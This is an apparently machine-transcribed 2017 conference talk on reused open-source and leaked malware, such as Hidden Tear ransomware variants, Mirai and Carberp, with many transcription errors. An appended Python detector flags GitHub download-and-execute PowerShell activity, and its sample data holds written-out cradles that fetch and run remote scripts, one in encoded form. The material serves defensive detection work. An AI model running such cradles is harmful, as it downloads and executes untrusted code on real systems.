
Sharing is not caring: Proliferation of GitHub code in real attacks

BSides London · 2017 · 37:51 · Published 2017-06

About this talk

What happens when attackers deploy open-source malware. Looking at open command and control servers to find attackers' toolkits. The problems when Red Teams copy attackers' malware. And the opportunities this all gives to defenders.

Transcript [en]

so thanks come the talks lunch is coming up quite soon so pretty being here my name is chris doumitt some of you might know me from iPods are called otx or another project called threat crowd most of you probably won't know me I won't bother with a bio bad to say that I got into the industry thanks to the cybersecurity challenge so I saw I've got a booth here so anyone's looking to get into it it's a pretty good start the talk today is an open-source malware I thought would be a nice topic given the overall b-sides thing is sharing is caring so kind of sit there had it all fits together an open-source malla

objects been like any other software it gets abused so it's not unique but the same time though some trends here we seem to be growing in the last couple of years so I'm going to talk about that through a couple of stories and if you saw the previous talk that's behind should always talk to a story so hopefully I'll be on point who's the first one I forgot to turn it on this is the first one okay anyone want to guess what this media clip is about now so this is about the December 2015 attacks against me cranium power stations so the time made quite a lot of news about 250,000 people were left without power on Christmas Eve so that

kind of sucked and the way the attackers did it was pretty interesting they actually simply stole a bunch of credentials through quite a long campaign and then they remotely connected in using stolen VPN credentials to discard the consoles and they just turned off some circuit breakers I guess I'm making it sound easier there's a whole nother stuff behind that that was quite a damaging attack it's a mr. Timothy green that just means don't stick this on the Internet this slide here there's the interesting attacker quite damaging one the way that these guys set up the attack is kind of all about how these guys normally operate so they're pretty typical example of a medium capability

group and that's where there's been quite a lot of growth recently or they've got coincidences reusing some open source malware so they've got some kind of funding or capability they've got from their own exploits so here you can see couple of CDs once the PowerPoint are delivering their malware or black NGO that another one there it's for scar the console so they can remote the connection General Electric stuff without sin skating they've also got some of their own Mac Pro droppers which are okay and then the malware they use most of the time it's called black energy and black hands you could spit in any of these categories really so originally two years ago you could buy

about 700 bucks including the source code as using some DDoS attacks against some Georgia during a certain conflict and then there's a second version we've got better that was sold again and then these guys got their own custom version it's a little bit smaller so they've got some kind of commercial stuff they use some of their own stuff they used to and then kill discs they also white disk just to make things a little more difficult so during the Ukraine attacks they they wiped a bunch of arm valve chairs that meant thing reset passwords too just to make sure the operators couldn't get things back up and running again also wipe discard a console in one

case because running Windows XP and they use commercial stuff like any good attacker they'll go around the network using the RDP and TeamViewer on some networks that will end in and then the reason I'm talking about them obviously is used open source too so use whatever kind of tools they need the job so we've got reader or we do I'm not trying to pronounce that after doing TCP over HTTP so on a type firewall they can still get a lot of traffic through they've got a web show they use just rip straight off of github they got dropped there which is an SSH server and then the guard ESC fix which is less and run unsigned drivers and

Windows so in this case they're doing that for their main Malheur of which jean which needs drivers so these attacks weren't unprecedented the DHS and the u.s. they warned about this particular group of status codes that were a couple of years ago when it's all them browsing around and stuff in the US about six months before these attacks in 2015 on the night of the Ukrainian elections they took out some summer TV stations just ran disrupt things a little bit so interesting guys and assume that they're in the one hand pretty good the other hand they use whatever they need to be gone so a couple of weeks later in January after these attacks in Christmas they came

back again they're talking about the same people some other people too and ESET picked up these attacks but this time rather than using the black ng malware which they've been using last couple years using G cap which is quite a nice backdoor off ticket half it uses Gmail for command control so written Python it's pretty solid piece of kit and I guess the reason they used it was because they're so associated with other piece of malware all the mountains change baby was still delivering in the same way though so it's also kind of obvious who was doing it and the guy that wrote this arm I'm sure a lot of you will know you write does some great

tools but in this case a little bit valve set that is to always abused to take out some power stations well so for later attacks so this is a pretty extreme example arm so we but careful about the slider Mabus before some of the recent events this is the kind of thing that obviously can happen if your leisure code to anyone to use obviously you can't control who's me using a software at that point this guy's an idiot arm he makes YouTube videos like you all have seen where you can use ends a rat some other free tools hack into people is that this guy tries to line up some other organizations and yet you can't really control huisman

using a software once you give it away for free interestingly enough he had this on youtubers first but they took it down straight away and on Facebook and they took a dance right away but that's been sitting it into the archive for two years and they're a really good charity that basically back up the internet so they're very busy they've got a lot of boosts complaints but if you try and control the information that was going to end up somewhere in this case with some of them have the resources tapers down even after they received abuse complaints the story continues this group of attackers they're called sam worm i didn't mention them before they were soon again december again this

time last december this time look they weren't using the open-source backdoor gee cat they using something that was kind of inspired by it there's amended to use their own version and that uses telegram and telegram instead for that command control so again pretty hard to detect those are upgraded from the rest of their kit to so using less of the open source stuff now they're using their own tools and bounced through networks and get lost firewalls and that's something that's not all that uncommon so there's really interesting group of attackers called Turla they were first seen in the 1990s cycle US government and back then their talk it was just a from frack so they

just listed source code from those kind of ASCII designs I think Frank still going that is what they talk over is in the 90s since then they've built their own platform they only use their own stuff now and now they're very good and as a report out yesterday on how they're using Britney Spears Instagram account and they're leaving little messes on her account and that's how they were doing their command control these days so blame Britney if you get hacked it wasn't upgraded their kill this stuff to now if they destroy your files they also leave you this nice kind of ransomware style message based off of mr. robot and there wasn't so much detail on this but

apparently they tend to be seen again this Christmas the attacks weren't so bad so maybe some lessons were learned samurai and everyone here knows Mariah really well obviously Internet of Things bottner affects things like webcams and rumors all around the world so the guy that wrote it he took out Brian Krebs his website with a massive DDoS attack I think some people said there's one of the biggest of the time some other stuff too probably doing that it obviously gets quite a lot of attention maybe more than he was expecting so after that he released the code open source for anyone to use maybe to try and get the heat off his back you can

the muddy the attribution in the water thereby everyone running your code and people not only run their own botnets because he gave a really nice user guide and how to set us up be able to improve that they added some extra fun abilities in there and talk talk you are always obviously having some issues they want to be with a bunch of rules compromise in these attacks obviously still going times of wanna cry botnets out there interesting enough to there's another worm that's kind of inspired by a rival team which arm Rahim I'm about to pronounce it there's semantic route up and they took the way the Mirai worked and they improved it's a far better

written piece of kit there's not written and go over for one thing and it goes around patching these vulnerabilities not the goes not not great so some of those are smiling at me there so this is the third story I think this is probably the most interesting one and turns all the ups and downs of it and you might have heard of some bit to this story it's about a piece of Merit or didn't air which is some open source ransomware which is release time to get half a couple years ago now being seeing in the wild quite a lot but I haven't seen all the ups and downs covered in one single place here and there are a lot of them

was written by this guy I think you pronounce his name Birds kouf but if anyone can correct me please let me know what is here in the audience respond let me know yeah he's just University student at the time he was studying info sex he thought was getting name out there by writing a piece of kit and giving away for free which is a fair enough thing to do he's got sense of humor you can see he's talking about asking for cookies and kebabs as part of the ransomware mode which is kind of funny and the original version doesn't actually encrypt all your files I they got to change them to get it working so

you said you wrote this as an educational tool so vendors I guess people like me could learn how to detect around to my better we already have enough around tumor samples before we don't need to be askin saw stuff but I mean that's why they did it I saw an interview with him where he was happy to talk about it and you said actually he wrote it to impress a girl which maybe is another reason why when the rites and open source ransomware apparently didn't work so he said but the second version of this he tried again was called with EDA named ask the girl he likes so I know maybe keep trying but yeah I think I hope it works

out for him though and but yeah I guess that's not the reason and the final reason was that he also maybe was kind of a honeypot so the idea is that he wrote this potentially bad piece of code with some crypto flaws in there so good we could get there fast back after around to my encrypted so maybe that's a valid reason it got quite a lot of attention so it was picked up and read it quite fast to be talking about it one guy suggested maybe he's add a backdoor which is what this song Fork suggested he rejected that one at that time and also pointed out so much crypto flaws so he's using a 32-bit arm interested to

generate around the key from that means correct me wrong I think about two billion values in modern modern computer depending on how it's done that could be brute forcible also based on the system time of when this thing's run so potentially you might think about some issues there so yeah this is the first time I'm seeing the wild I think and this trend might have picked this up you visited website in Paraguay down there is a flash update or whatever it was this would be on your computer screen it's good source and it actually I'm able to get these people as far as back if I'm getting copper the malware anchor we did send them a copy the malware he didn't

do break his own crypto perhaps using some of the suggestions that other people had given him on reddit the way he did it was he looks to some of the first stars were encrypted and the base is that he goes just some time and then this different time isn't be exactly the Cummings that the password that was used in privileged stars with but it's more or less about that time so then he brute forces either side that time you can see here about 45,000 go they took him to get that which is obviously pretty quick to guess so it did magic 8-bit as far back so you know some kudos there and this was actually inspired by

bitdefender who cracked another piece of ransomware called linux included or using the same mechanism they'd made a same mistakes there but in the case of linux encoder the equipped so so bad the the bad guys accidentally encrypted your files multiple times and not for i'm rounds just keeps on running yeah so you can't get your files back even if you either crack their code because it's gone or if you pay them he's doing get afar's back so that kind of sucks so yeah this is either to the improved version he wrote some named after someone and gone on most of those Krypton's impatient flaws so he taken some advice and proved it it's obviously a little bit dodgy depending on the

reasons why you're writing you know a piece of code like this again it didn't take long for this to see in the wild so let's say you going to play Far Cry and I can see why you might it looks like farmers a guy with antlers and all that kind of thing complain if it does look good now but it's going to cost you 39 pounds and a nice line pan to the biome steam that's my chest a couple days ago there's quite a lot of money so the obvious thing you can do is going to Google for a crack you find this video of these two lovely people going to give you that perhaps

because they play firefighter 3 which is just great Google always make sure that YouTube ranks well hence why this stuff ends up there oh no they don't give it a crap a far cry of course this is an either to barring the ransomware which assesses a ton of people and the message you get when you're infected this is pretty annoying this guy said we're never bear to find me police will never find me and then he equates the kind of crypto abilities our best buy with the NSA for they must say no those guys and get your files back to your screws so to the rescue again the ash did magical as far as that this time you taking the advice

I was given read it he added the back door so even though the crypto have been fixed you can login to the man control server pick up those keys and then give them back to everyone so this was shared on the bleeping computer forums incidentally I got a couple screenshots immensely thanks to you via the computer so that was nice of him although I think in the UK actually the computer misuse that might not let you hack into the bad guys but I don't know obviously didn't take long for what other people thought his code on github that's what we did because I'm getting off you fork and you improve it so this guy here he thought

they'd just be embarrassed by his bad code improved it he fixed a lot of those those mistakes he left in there and the reason that he made it was to help law enforcement understand what ransom where's work like so who if anyone here is from law enforcement you can consent this guy whose handlers empanel for giving away this more improved around somewhere that doesn't have this brought him interesting enough that he missed the back door even though Evan was talking about at the time someone else went out to him and he removed the back door so you can no longer login and get the keys back obviously it didn't take long before this see in the wild so

let's see when I play Minecraft it looks like a really fun game is loading and get craft very nice but oh no it's all this malware so this is ransomware based off Dalek which is itself a variant of either to which itself is improved version hidden tear so I think this is laughing my ass off at use or the Marxist either way it's yeah I'm not sure other way if another piece of renewing malware I think pretty much the last week systolic was taken down off the github I think the guy that wrote it maybe had a change of heart haven't seen it using the wild but again it's still on github though because obviously it was locked and other made

identical copies or they've improved it so there's a github repo we can still get it from I was also surprised I was looking into this and who wrote this I found some video interviews with the author it turns out he's a 13 year old Bitcoin developer from India so at that point my view of him changed a little bit arm I mean I think maybe releasing open-source rat summer I don't think it's great idea I wouldn't do it but the same time I'm sure a lot that has done dumb stuff when we were 13 talking which that line the bottom that's me when I was his age I wrote a UNIX password cracker in Perl which kind of shows my

age that's the disclaimer on there is terrible though EBIT remember on it I think it cracks like one password a second so no one's going to use it but you know the point here is that over the stupid stuff I did when I was 17 that's still out there about 17 years ago my stability in still out there they want something's out there you can't put the genie back in the bag this happened yesterday so about this kids that good to me because it's quite tough golf to talk a 14 year old was arrested in Japan for ransom ransomware and then making it read about online a minor in the article a couple of things stood out for one thing this

is apparently Japan's first arrest of somewhere someone that rogue ransomware also this kids in actually deployed in the world it it says that this guy's didn't actually infect anyone could just go wear the coat and said the hundred people downloaded it so I feel a bit bad for this guy again I think I wasn't a great idea to him to write this ransom and make it available but you know it looks like it infects anyone so this is another either two variants so it's clear that the guy are showing earlier this was his second one to impress that girl see if someone made another variant of this using the wild could magic another annoying ransom I know but this

time the the story took a bit of a turn for the worse so the good guys took down the server from which all these keys were being backup from and also where all the erratum has been served from and that's a great thing to be stopping additional infections with stopping the bad guy man to make some more money problem with that is though at that point but who can't log in and then download all those old keys I mean there's not a bit of online anymore he can't just hack in and get people's data back so that sucked and then people pretty upset about this there's a guide post on bleeping computer saying hey I lost these photos

and my kids can help me and I saying no I'm sorry but I mean all those foes backed up 10 years you should have backed them up but the ransomware author actually of this magic Varian actually went on the forum and said I have made a backup of these keys I can probably get your files back but he had a condition and that condition was the earth - I had to take down both the ITO - and the hidden tear source code so he's kind of blackmailing him he also asked some money - and if you look at the discussion it gets pretty aggressive as a critical dimension to it who's Turkish this guy the Randleman author is Russian

they didn't get along very well say so the thief but he did agree in the end because you wanted those guys to get their files back so it could did take that into an either - and the original repository is now just show this so the disclaimer and the logo he recently upgraded the logo for either - though arm so I guess the branding still going there and he wrote a blog about his whole experiences and the whole ups and downs of this I'm saying that I'm sorry I fell this time is pretty much how it sighs it off I did actually contact him as well he read my message didn't get back to me

but he's spoken about copper these things then not all the bits that computers himself so and guessing's happy to share his stories about all the ups and downs here obviously as I mentioned earlier though once your code is out there is out there you can't get that back in the bottle so that all these different folks here so you can see here there's a ton of arm in Terry ins just identical clones up on github you can also see here there are some improved versions as well someone's ported hidden tear to C++ which i think is really weird because there isn't hidden tear is a couple of hundred lines of vbscript on that it's not very good if you can write C++

you can probably write your own ransomware the other reports improvements the main version doesn't cookbook files by default he's supposed to do so yeah it's all there and it is back up on the committee stories too so the codes are out there and now everyone is seeing into some wild so I picked these screens up really quickly two credits to a couple good at the end also since the sandbox reports I ran through so you can see here that is Santa Claus smoking and join who has encrypted your computer not very nice man are my naughty list there's ticket to around somewhere this this I'm told you not to downloads random [ __ ] off the internet I'm given

that you've just been infected you probably know that now anyway there's loads here's some more variants I could have put down hundreds of pictures but they're twin bed space that ones mr. robot picture this one's great this one says that arm it's not Microsoft Windows support then later said it is Microsoft Windows support you've been infected with Zeus virus please call us so this is actually a bunch of tech support scammers who normally they throw not people and try and get in to turn them back and take into all the computer or they just flash up those banner ads saying you're infected now I'm moving to use hidden tear see it all these variants by the

way of the reason I'm showing is because we're all either hidden terror either two variants that's only nominal longer works though this one does have to find a later version so if anyone wants to cool them you Brewin check how much the cost of throwing that but there you go I mean most of these slides will be available online later this one looks terrible but it plays the Harry Potter theme too which is kind of cool when you're infected again credited weeping computer this one this one you can't really see on this screen are it just deletes all your files still based on the ransom of hidden tear but it just dumps the key doesn't you send it off so

that no we're getting files back someone's is not very nice this one looks a little bit more familiar maybe anyone recognize what this kind of looks like yes yes yeah yeah so these guys are impersonating wanna cry it came at the same time it's light as insects around copy other insects you know look more dangerous whatever I don't know how successful it was I think they call it dark cry this one got a lot of attention so a few of you might have seen this one rent somewhere this is based on I think it's hidden terror I'll neither - so - get your far back you have to play this anime game and get to an insanely high level before

they'll give you a fart back which it's brilliant so if you look at the thing here you have to get northing civilian school it sounds quite high on lunatic level so that's pretty tough the guy that wrote this felt kinda bad about it he released a crack which was an sitting memory and then tricked us into thinking you've got two nor point two billion on lunatic level so you can get your files back this one doesn't actually ask the money ah it's kind of nice I guess it gives you the key phrase back straightaway so the idea here is trying to educate about ransomware by infecting with ransomware this one's for being a scariest one this

is ransomware as a service so for one hundred and seventy-five dollars you can buy this hidden tear variant and they'll start up a service for you they'll set up because it's game for you but they've always kind of infrastructure that kind of thing so you don't really need to know much to duel if you're running this and $125 we're really cheaply buying into the low-end criminal game and this is another one those kind of growth areas where there's a lot of this arm because open source stuff seemed to be being used now and that's scary if it's once you made 135 dollars so it's maybe a first victim but you've infected I mean you've made your money back you

can reinvest so you can buy tile and exploit kill or you know improve other stuff so yeah that's pretty while we're seeing a lot more variants like this this is a really good map of route to my family's semi prominent ones by f-secure this is over time going forward or grouped by month so I was going to arm a little icon for every kid enterin either - variant but taking really long time so if you just take my word for it when I was looking to the first couple of months it was a bit under one in five simply based on these so quite a lot but this obviously does not take in the count

just what the distribution is so it's under locky and that really big piece of ransomware ever missing has been dispute in the same way as dry debt that would in fact the millions of people whereas some of these really affected a few people these are numbers from Trend Micro they've been looking at himself quite a bit so over month just how many from families they've seen and it's in.net obviously the source codes and lines pretty easy to fall so if it's only goes up to March but I was looking in May and I'm pleased sure that number would have jumped up quite a bit disarmed this has been a growing problem that's not going back down I'm not sure

why does that drop with a Christmas but I guess ransomware developers maybe take some time off so I always like reading these messages about what are the kind of caveat summers github repos bhai should use it so hidden tere says it's may only be used for educational purposes obviously that's not what happened and I have no legal background but as far as I'm aware that means nothing putting that on your repository saying please don't be evil with this it probably just means you know you're doing some little bit sketchy maybe and you can walk hoping that nothing will happen I know that because that's what I used to disclaim on source code that I published as a teenager classwork

records I mean I pass the crack is not as bad around somewhere but I still felt a little bit worried about it so I'd stick this on it open-source license again not a lawyer I'm told it will fast smarter than me that you're not allowed to do take usage with the standard open-source licenses so you can't as part of that life and say this cannot be used for evil that is not allowed in the way that their license works not their be enforceable anyway and in bassin are or vaasana' and i pronounce that but that arms free that covers some cyber stuff i was in use quite a lot again i don't really know it but could be

smarter than me are arrests and stuff saying that it does not apply to open source explicitly in the definitions there but until you publish the code apparently can so just to end a bit on hidden turnovers or ransomware this is a poll by two SEC's probably our best known as malware Tech's best mate so he asked do you think I'm the paraphrase over here do you think that github should be hosting open-source ransomware so for those that have got some energy arm when putting your hand up if you think github should not host open-source ransomware people and handle if you think it hub should host should be allowed to so I think here it's about seventy five percent you

would think that github should be hosting github was around that kind of thing I'm kind of in the middle I mean despite actually doing a talk in this I don't really know myself my views bounced around between the both of them so this last section is on leak source code so technically leak source code no stuff that's been stolen and stuck on github or wherever it's not open source I thought talked about it it's quite topical and also because if you're an attacker and you'll be using some code you don't really care about the license if someone hasn't given you permission to use this backdoor against someone I mean you're hacking them anyway not can

care about the licensing so obviously shadow brokers is rather famous example it's allegedly a bunch of stuff in the NSA entire platforms exploits documentation many many millions of pounds worth of stuff was published here it was allegedly done by some Russian hackers and yeah there's loads it up here but when it's first copied over onto github it was taken down it wasn't taken down because of the exploits it was because they had an oxygen message on there from the shadow brokers asking for Bitcoin donations and you're not allowed to illicit the money for stolen stuff on github that is against the rules so they've actually got a really hard job I feel forget hub I'm not criticizing them

they got to choose the line somewhere and that's where they they just throw it you also can't host compiled malware so you cannot just stick like NJ rats or XE on a github repo and that were downloaded that's not okay are be can host scripts which can be X through that is so when I used to into response remembers one job where the attackers kept a straight off github powershell scripts and password and executing it among really leet command-line things so download and execute off github and on the network level without asking pretty tribute exactly because we're just seeing that excel termination connection to github on the host boat is not that hard thankfully and other stuff too so

someone uploaded the list of vulnerable websites that was taken down from github then they change the mind go back up again we've got they've got a hard choice you know allows you to github the command control that is against the rules too so you can't be putting message on here's Jim coming in setting people fire it so the group of attackers that were doing that but a lot of people have but one of them had a part-time job as a pig farmer and trend did it's really nice arm piece they looked into him and his profile picture on some some forums is him in bed with a pig I have that photo in the deleted slide section

so I finished early I can show that anyone want to see a a very good actually attacker that likes pigs so wanna cry is obviously very topical to how to find some kinda way of speaking missing the talk thankfully there was a pretty good way if you're doing like a drinking game with passwords this would be a good one to drink to so the shadow brokers exploits one of which obviously a ton of blue is used in one a crime to spread around smb1 connections that came out on April so there were some heads off as we come out before that but one a probs didn't come out till about another month and BAE did

a really good analysis, I think in the month of it, on Reddit, so if you haven't read it, it's really worth checking out. It showed it wasn't the original vanilla Shadow Brokers exploit that they were just using straight, taken as-is; they were using a far easier-to-use, well packaged-up version that was published open-source onto GitHub just before WannaCry came out. So they took advantage of that; someone packaged it up nicely, and they also put it into Metasploit as well as part of that process. So I don't know, maybe they would have made the worm anyway, or maybe it would have taken a bit longer; at some point this is going to happen, obviously, when you have a really good exploit it is going to end up nicely usable in

Metasploit. So I saw a presentation recently talking about how they were very happy that in one case there was an exploit in the wild and the very same day they managed to get it into Metasploit, and they were just talking about how fast the community can go to get these tools out there. And I think Metasploit overall is a very good thing; I think the kind of debates people were having years ago are done, people will agree that it makes the job easier. But in the case of having it in there that quick, I don't think it really necessarily helps from a defensive side. I think more what we're saying is that it was great for vendors who could test their detection by

having it in Metasploit. But as a security vendor, we really already have access to most of those exploits; there are obviously those programs where the stuff gets shared, ideally as quickly as possible. I'm not complaining, but I'm not saying that it helps the defensive side either. It's always nice to see what goes around comes around. So if the Shadow Brokers, the guys leaking those NSA exploits, are anyone, it's probably these guys: Fancy Bear, also known as APT28 or Sofacy. They're really prolific; these guys are hacking tens of thousands of people, they're the ones that hit the DNC in the US elections and, more recently, the French elections. They've been attacking for nearly ten years and are hitting more

and more people every year. They are good, but it's also another example of a medium-capability group that needs to do whatever they can. So yeah, these guys make a ton of mistakes; in this case they left open the command and control server and anyone could pick up the server side of their malware. I think the domain, I remember, was "transition mail" dot com; I think it was hosted on that first, and people were looking at it for a long time. Also on the kind of defensive side of sharing is caring: Google wrote a paper on this piece of malware. It was being shared around people for a long time; there was a TLP Amber on it, which means it should be kept off the

internet, for example, and then someone published it, and that probably means that Google aren't going to be so willing to share information on these kinds of attacks around the industry so much when that happens. So that's the other side of sharing is caring: there's a whole debate, obviously, on the defensive side about how much information should be shared and how you control that. The company that I work for, we try to improve how we do that a lot, but yeah, I won't go into my work; it's a hard problem. So Hacking Team. Again, I think everyone here has heard of Hacking Team; they are a somewhat controversial company that sells surveillance software. So

some of the stuff they do is they sell this kind of kit to law enforcement to do counterterrorism, which I think most would say is quite good, but they also sell this kind of kit to dictatorships to hack into their political opponents and journalists, which some people say is bad. So someone got rather upset about this, and they stole this stuff and they stuck it on GitHub, so you can now download this straight off. I think I'm doing okay on time so far. So yeah, anyone can get this now, and this is an entire platform as well, so again a massive leak. Part of this too were exploits as well; as part of this dump, yeah, there are two exploits in particular

that were shared, and there's a really nice analysis of how these are shared between different groups of attackers. So if you look at Chinese kind of targeted attacks, it looks like there's one central development shop which then shares the code they build with other people. So this central development shop, the "quartermaster" as some people are calling them, they would take these exploits, make them easier to use and then hand them off to other related groups. When I was at PwC we were seeing similar stuff with a web exploit framework, ScanBox: the guys that hit the Office of Personnel Management in the US and all those health care companies were using some of this kit, and in other cases some

people attacking Tibet were using it, again from one central place, and that's how that code is shared. So Carberp. Again, towards the end now, so some criminal stuff. So this guy's having a really bad day: he's one of the guys who was leading Carberp, which is a piece of banking malware which was really big and popular a few years ago. They made many, many millions of pounds; eventually they were arrested. They made the mistake of hitting Russian banks, even though the ringleaders were based in Moscow, so yeah, not a good idea. Again, if there's time I can show the video later; it shows this guy in his pants being arrested by the FSB, not very happy. Yeah, and it was

roughly about 20, 25 people working, mostly remotely, paid a couple of grand each to build extensions, to say web-inject this particular bank, affecting that bank's customers, whatever, that kind of thing. All together a decent, serious piece of kit. And these guys got arrested, the code got leaked, and the way it got leaked was the same as used to be the case with the Zeus banking malware: how that code got out was, when the arrests happened, people that still had access to the code started selling it, I think for forty thousand dollars, which is a pretty good deal for quite a serious bit of kit. Then it drops and drops and drops as more people share it, as ever, and it's freely available and now anyone can use

it, and everyone is using it. So obviously there's tons of banking malware that still uses Carberp, and also still uses Zeus, given that that code leaked too. Sofacy, the Fancy Bear I mentioned a minute ago, that kind of Russian group, they're using that code, and why not? They haven't got time to write all their own software all the time, and every different variation, when stuff gets picked up. Another big leak that came out recently was Vault 7 by WikiLeaks, allegedly the CIA's tooling, so all these kits are out there, and again that involved entire platforms and all this stuff, and apparently they were using Carberp. So they are saving taxpayer money by using some publicly available code, which

is great. They're not using all the code, just some bits, and they carefully vetted it for vulnerabilities, which is quite a good idea when it's just a bunch of guys working remotely, paid two grand, building this stuff. So just to end on a more positive note: is there an upside to all this, this kind of reuse of malware and stuff being open-sourced? We're just coming back to Hidden Tear; I thought this quote was quite nice, off Twitter. So the Zeus banking malware is available now everywhere; so much malware now is based off Zeus that people don't want to buy that any more, because it gets detected quite easily by particular AV vendors. For one

thing, there's a mutex which most of those variations share, so they can pick that up, but tons of other abilities too; people are good at picking up these variants. The same with Hidden Tear: it's not a hard piece of malware to detect, even the generic ransomware ones, they can be detected quite easily. You can pack and obfuscate it, but it's still not that easy. Turns out Carberp does have a back door, well, it's got vulnerabilities, it's got tons of them actually; if you ever take a look at the server-side code it's horrible PHP, there's loads of unchecked stuff going on. And it didn't take long before a couple of researchers found some backdoors, and then what they

did, upon finding the vulnerability, was they went around attacking Carberp servers, and here's some stuff they found, some of the bad guys' stuff. So here's a bunch of different dealers, here's some telemetry around the world of the victims connecting to one server. It was the family you'd expect, so signs, forms and banks, that kind of thing; loads of stuff they picked up there. And I was looking at njRAT, at the source code there; it looks pretty bad, so if anyone wants to attack another of these open-source things, no one's done it yet. Yeah, but someone better than me, I'm terrible at exploit dev, but someone could be precise and stuff

there. So finally I want to thank all the people whose slides, well, screenshots I nicked, the works from sandbox reports, and in particular these people; if I missed anyone, sorry about that. So that's it for me; if there are any questions then I'm happy to take them. [Applause]
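The talk's point about download-and-execute off GitHub is that the network side only shows an HTTPS connection to GitHub, which looks like ordinary developer traffic, while the host side (the PowerShell command line in a process-creation event) gives the game away. The following is an added example, not code from the talk or the speaker: a small detector that runs over constructed process-creation records (every host name, user, URL and repository path below is made up) and flags PowerShell command lines that combine a GitHub URL, a download primitive and in-memory execution, decoding `-EncodedCommand` payloads first so the encoded variant does not slip past a plain string match.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlparse

# Domains GitHub serves raw file content from (also used by perfectly legitimate tooling).
GITHUB_DOMAINS = ("github.com", "githubusercontent.com")

# PowerShell primitives that together form a download-and-execute cradle.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.I,
)
EXECUTE_RE = re.compile(r"Invoke-Expression|\biex\b|\[ScriptBlock\]::Create|\.Invoke\(\)", re.I)

# -EncodedCommand and its accepted abbreviations (-e, -ec, -enc) carry a base64 UTF-16LE script.
ENCODED_ARG_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)

# Office applications spawning PowerShell is a classic phishing-document tell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline: str) -> str:
    """Return the command line with any -EncodedCommand payload decoded and appended."""
    match = ENCODED_ARG_RE.search(cmdline)
    if not match:
        return cmdline
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: leave the raw line for the analyst
    return f"{cmdline} ;; decoded: {decoded}"


def github_urls(text: str) -> list:
    """Extract URLs whose host is GitHub or one of its raw-content domains."""
    found = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in GITHUB_DOMAINS):
            found.append(url)
    return found


def analyze_event(event: dict) -> Optional[dict]:
    """Flag a PowerShell process-creation event that pulls a script from GitHub and runs it in memory."""
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    text = decode_encoded_command(event["cmdline"])
    urls = github_urls(text)
    # A plain download to disk (e.g. fetching a release archive) is not flagged; all three must be present.
    if not (urls and DOWNLOAD_RE.search(text) and EXECUTE_RE.search(text)):
        return None
    reasons = ["github_url", "download_primitive", "in_memory_execute"]
    if ENCODED_ARG_RE.search(event["cmdline"]):
        reasons.append("encoded_command")
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("office_parent")
    return {"host": event["host"], "user": event["user"], "urls": urls, "reasons": reasons}


def analyze(events: list) -> list:
    """Run the detector over a batch of events and return the findings in input order."""
    return [finding for finding in (analyze_event(e) for e in events) if finding]


# Constructed sample records (hypothetical hosts, users, repositories and URLs).
_CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
           "'https://gist.githubusercontent.com/example-user/0000/raw/stage.ps1')")
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "ws02", "user": "bob", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString("
                "'https://raw.githubusercontent.com/example-org/tools/master/run.ps1')\""},
    {"host": "srv03", "user": "svc_build", "parent": "jenkins.exe", "image": "git.exe",
     "cmdline": "git.exe clone https://github.com/example-org/build-scripts.git"},
    {"host": "ws04", "user": "carol", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"host": "ws05", "user": "dave", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"Invoke-WebRequest -Uri "
                "https://github.com/example-org/tool/releases/download/v1.0/tool.zip -OutFile C:\\Temp\\tool.zip\""},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The three-way condition is deliberate: a `git clone` or an `Invoke-WebRequest` to a file is the normal developer traffic the speaker says the network view cannot distinguish, so only the combination of a GitHub URL, a download primitive and an execute primitive raises a finding, with the encoded form and an Office parent process recorded as extra reasons for triage. On Windows this command-line text is only available if process command-line auditing is enabled for event 4688 or a tool such as Sysmon (event ID 1) is deployed; without it the host-side visibility the talk relies on does not exist.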